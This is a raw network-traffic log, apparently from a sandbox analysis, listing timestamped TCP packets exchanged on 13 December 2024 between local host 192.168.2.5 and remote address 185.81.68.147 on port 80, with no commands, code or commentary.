                                                                                                                                                                Dec 13, 2024 01:37:13.604266882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.604320049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.605057001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.605165958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.605217934 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.605995893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.606097937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.606149912 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.606889009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.607000113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.607055902 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.607798100 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.607919931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.607971907 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.608700037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.608817101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.608870983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.609596968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.609705925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.609760046 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.610519886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.610619068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.610670090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.611396074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.660923004 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.755691051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.755785942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.755842924 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.756067038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.756197929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.756253958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.756983995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.757313967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.757369995 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.757402897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.758214951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.758260012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.758327007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.759180069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.759222984 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.759268045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.760035992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.760091066 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.760142088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.760934114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.760977983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.761023045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.761873960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.761917114 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.762048960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.762798071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.762846947 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.762867928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.763688087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.763734102 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.763782024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.764615059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.764657974 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.764702082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.765500069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.765549898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.765604973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.766422033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.766515970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.766547918 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.767328024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.767379999 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.767425060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.768234015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.768284082 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.768328905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.769123077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.769165993 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.769232988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.770064116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.770107031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.770149946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.771028996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.771074057 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.771087885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.771855116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.771895885 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.772042036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.772792101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.772833109 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.772866011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.773685932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.773727894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.773771048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.774589062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.774633884 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.774714947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.775538921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.775582075 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.775676012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.776403904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.776443958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.776520014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.777359009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.777400970 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.777430058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.778242111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.778280020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.778352022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.779136896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.779176950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.779257059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.780071974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.780112982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.780147076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.780983925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.781025887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.781055927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.781857014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.781929016 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.781965971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.782766104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.782807112 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.782854080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.783698082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.783742905 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.783797026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.784615040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.784658909 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.784688950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.785511971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.785558939 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.785653114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.786446095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.786494017 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.786524057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.787348032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.787400007 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.787470102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.788233995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.788285017 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.788361073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.789161921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.789251089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.789277077 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.790062904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.790108919 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.790183067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.790966034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.791044950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.791069984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.791873932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.791941881 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.791982889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.792782068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.792855024 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.792931080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.793692112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.793737888 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.793782949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.794624090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.794657946 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.794683933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.795516014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.795564890 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.795614958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.796436071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.796480894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.796571016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.797333956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.797379971 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.797425032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.798228025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.798273087 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.798346996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.799154997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.799201965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.799231052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.800059080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.800106049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.800148010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.800988913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.801032066 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.801078081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.801855087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.801903009 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.801980019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.802788973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.802839041 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.802856922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.848453045 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.947786093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.947885990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.948021889 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.948188066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.948340893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.948405981 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.949095011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.949217081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.949342012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.950031996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.950138092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.950249910 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.950917006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.951026917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.951081038 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.951832056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.951956987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.952482939 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.952756882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.952791929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.952863932 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.953636885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.953758001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.953819990 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.954551935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.954667091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.955319881 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.955460072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.955565929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.955646038 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.956350088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.956464052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.956749916 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.957320929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.957437038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.957607985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.958338976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.958440065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.958498001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.959122896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.959281921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.959748030 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.960030079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.960169077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.960222006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.960933924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.961047888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.961236000 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.961849928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.961994886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.962176085 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.962728024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.962838888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.962886095 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.963649035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.963768959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.964194059 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.964611053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.964687109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.964742899 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.965497017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.965643883 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.966305017 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.966387987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.966559887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.966605902 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.967277050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.967406034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.968063116 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.968221903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.968380928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.968430996 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.969103098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.969209909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.969827890 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.970002890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.970125914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.970174074 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.970942974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.971072912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.971596956 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.971849918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.971976995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.972035885 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.972728014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.972840071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.973381996 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.973680019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.973790884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.973839045 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.974553108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.974690914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.975173950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.975521088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.975699902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.975783110 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.976403952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.976506948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.976739883 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.977304935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.977471113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.977526903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.978236914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.978576899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.978629112 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.979119062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.979232073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.979290009 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.980031967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.980130911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.980253935 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.980925083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.981053114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.981111050 CET4970780192.168.2.5185.81.68.147
